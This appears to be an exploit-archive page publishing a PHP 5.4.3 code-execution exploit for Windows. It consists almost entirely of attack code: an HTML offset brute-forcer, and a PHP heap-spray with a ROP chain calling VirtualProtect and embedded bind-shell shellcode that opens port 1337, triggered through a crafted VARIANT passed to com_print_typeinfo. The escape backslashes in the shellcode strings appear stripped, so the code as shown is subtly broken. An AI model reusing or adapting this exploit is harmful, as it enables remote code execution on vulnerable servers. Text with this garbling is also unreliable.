PHP 5.4 (5.4.3) Code Execution (Win32)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP 5.4 (5.4.3) Code Execution (Win32)
# Published : 2012-05-11
# Author :
# Previous Title : Final Draft 8 Multiple Stack Buffer Overflows
# Next Title : BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)
// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)


===================
 offset-brute.html
===================

<html><body>
<title>0day</title>
<center>
<font size=7>PHP 5.4.3 0day by 0in & cOndis</font><br>
<textarea rows=50 cols=50 id="log">&lt;/textarea&gt;
</center>
<script>
function sleep(milliseconds) {
  var start = new Date().getTime();
  for (var i = 0; i < 1e7; i++) {
    if ((new Date().getTime() - start) > milliseconds){
      break;
    }
  }
}
function makeRequest(url, parameters)
{
    var xmlhttp = new XMLHttpRequest();
    if (window.XMLHttpRequest) {
        xmlhttp = new XMLHttpRequest();
        if (xmlhttp.overrideMimeType) {
            xmlhttp.overrideMimeType('text/xml');
        }
    } else if (window.ActiveXObject) {
        // IE
        try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
        catch (e) {
            try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
            catch (e) {}
        }
    }

    if (!xmlhttp) {
        alert('Giving up :( Cannot create an XMLHTTP instance');
        return false;
    }

	xmlhttp.open("GET",url,true);
	xmlhttp.send(null);
    return true;
}
test=document.getElementById("log");
for(offset=0;offset<300;offset++)
{
	log.value+="Trying offset:"+offset+"rn";
	makeRequest("0day.php?offset="+offset);
	sleep(500);
}

</script></body></html>



===================
     0day.php
===================

<?php 

$spray = str_repeat("x90",0x200); 
$offset=$_GET['offset'];
// 775DF0Da   # ADD ESP,10 # RETN    ** [ole32.dll] 
$spray = substr_replace($spray, "xdaxf0x5dx77", (strlen($spray))*-1,(strlen($spray))*-1); 
// :> 0x048d0030
$spray = substr_replace($spray, pack("L",0x048d0030+$offset), (strlen($spray)-0x8)*-1,(strlen($spray))*-1); 

//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN   [ole32.dll]
$spray = substr_replace($spray, "x9fxaex52x77", (strlen($spray)-0x10)*-1,(strlen($spray))*-1); 

// Adress of VirtualProtect 0x7c801ad4
$spray = substr_replace($spray, "xd4x1ax80x7c", (strlen($spray)-0x14)*-1,(strlen($spray))*-1);

//  LPVOID lpAddress  = 0x048d0060
$spray = substr_replace($spray, pack("L",0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);

// SIZE_T dwSize  = 0x01000000 
$spray = substr_replace($spray, "x00x00x10x00", (strlen($spray)-0x20)*-1,(strlen($spray))*-1);

// DWORD flNewProtect =  PAGE_EXECUTE_READWRITE (0x00000040) | 0xffffffc0 
$spray = substr_replace($spray, "x40x00x00x00", (strlen($spray)-0x24)*-1,(strlen($spray))*-1);
// __out  PDWORD lpflOldProtect = 0x04300070 | 0x105240000

// 0x048d0068
$spray = substr_replace($spray, pack("L",0x048d0068+$offset), (strlen($spray)-0x28)*-1,(strlen($spray))*-1);

//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C    ** [ADVAPI32.dll]
$spray = substr_replace($spray, "xb4xe8xdfx77", (strlen($spray)-0x18)*-1,4); 
// Ret Address = 0x048d0080 
$spray = substr_replace($spray, pack("L",0x048d0080+$offset), (strlen($spray)-0x48)*-1,4); 



$stacktrack = "xbcx0cxb0xc0x00"; 
// Universal win32 bindshell on port 1337 from metasploit
$shellcode = $stacktrack."x33xc9x83xe9xb0".
  "x81xc4xd0xfdxffxff".
  "xd9xeexd9x74x24xf4x5bx81x73x13x1d".
  "xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96".
  "xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2".
  "x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0".
  "xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41".
  "x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82".
  "x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2".
  "x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39".
  "xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9".
  "x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b".
  "x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a".
  "x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88".
  "x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01".
  "xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20".
  "x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e".
  "xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39".
  "x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44".
  "xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96".
  "x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38".
  "xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9".
  "x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09".
  "x4ex33xe4x96xcdxccx32x69";


$spray = substr_replace($spray,$shellcode, (strlen($spray)-0x50)*-1,(strlen($shellcode))); 
$fullspray="";
for($i=0;$i<0x4b00;$i++)
{
	$fullspray.=$spray;
}
$j=array();
$e=array();
$b=array();
$a=array();
$c=array();

array_push($j,$fullspray);
array_push($e,$fullspray."W");
array_push($b,$fullspray."A");
array_push($a,$fullspray."S");
array_push($c,$fullspray."!");


$vVar = new VARIANT(0x048d0038+$offset); 
// Shoot him
com_print_typeinfo($vVar); //CRASH -> 102F3986   FF50 10          CALL DWORD PTR DS:[EAX+10]

echo $arr;

echo $spray;

?>